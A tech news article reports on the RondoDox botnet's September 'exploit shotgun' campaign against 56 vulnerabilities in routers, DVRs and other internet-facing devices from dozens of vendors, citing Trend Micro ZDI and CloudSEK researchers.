A new RondoDox botnet campaign uses an “exploit shotgun” – fire at everything, see what hits – to target 56 vulnerabilities across at least 30 different vendors’ routers, DVRs, CCTV systems, web servers, and other network devices, and then infect the buggy gear with malware.
RondoDox is a new-ish botnet that first surfaced in mid-2025 and weaponizes command-injection flaws in internet-facing devices. In recent months, it’s been spotted delivering multi-architecture payloads that infect vulnerable gear with a Mirai variant, which allows attackers to remotely control infected equipment and perform large-scale network attacks, including DDoS campaigns.
The campaign targets a huge range of infrastructure, including Cisco, D-Link, Linksys, and Netgear routers, along with Apache HTTP servers, Brickcom IP cameras, and AVTECH CCTV systems, among many others, according to Trend Micro’s Zero Day Initiative researchers, who spotted the botnet exploiting a bug first disclosed at a previous ZDI Pwn2Own contest.
This type of exposure opens up organizations to potential data theft, long-term network compromise, and operational disruption, so unless you want to risk RondoDox living rent-free on your network devices, it’s a good idea to check out ZDI’s very long list of all of the affected vendors and their products, CVEs seen in the campaign (if a CVE has been assigned), and the way in which each vulnerability is being weaponized in the campaign.
While we’re not going to list all 50-plus bugs or the dozens of products, they include CVE-2024-3721, a critical vulnerability affecting TBK DVR devices that allows remote attackers to execute arbitrary commands, and CVE-2024-12856, an OS command injection vulnerability in Four-Faith industrial routers that allows remote attackers to execute arbitrary commands.
FortiGuard Labs previously linked both of these vulnerabilities to RondoDox.
While the bug hunters don’t know how many devices have been infected, “any consumer product with internet access was likely targeted in this attack,” ZDI senior threat researcher Peter Girnus told The Register. “The loader script tied to the exploits contained multi-architecture payloads designed to infect a variety of Linux systems with a Mirai variant.”
Critical Wazuh bug exploited in growing Mirai botnet infection
DDoS is the neglected cybercrime that’s getting bigger. Let’s kill it off
US cops wrap up RapperBot, one of world’s biggest DDoS-for-hire rackets
Google sues 25 alleged BadBox 2.0 botnet operators, all of whom are in China
The exploit shotgun began on September 22, peaked on September 23, and continued through September 24, Girnus said, adding that the bug hunters haven’t seen any new events since then. “It may have been a smash-and-grab campaign,” he noted.
Although ZDI doesn’t have enough data to attribute the assault to a particular crime group, or to know what the attackers are doing once they’ve occupied vulnerable devices, the security researchers “are actively tracking this botnet,” Girnus said.
It’s especially concerning because RondoDox recently broadened its distribution by using a loader-as-a-service infrastructure that co-packages RondoDox with Mirai and Morte (a Mirai variant) payloads.
Shortly after ZDI spotted the peak, CloudSEK warned about a “sophisticated” botnet operation using a loader-as-a-service model and distributing RondoDox, Mirai, and Morte payloads through routers, IoT devices, and enterprise applications. These attacks spiked 230 percent between July and August, the threat intel firm said. ®
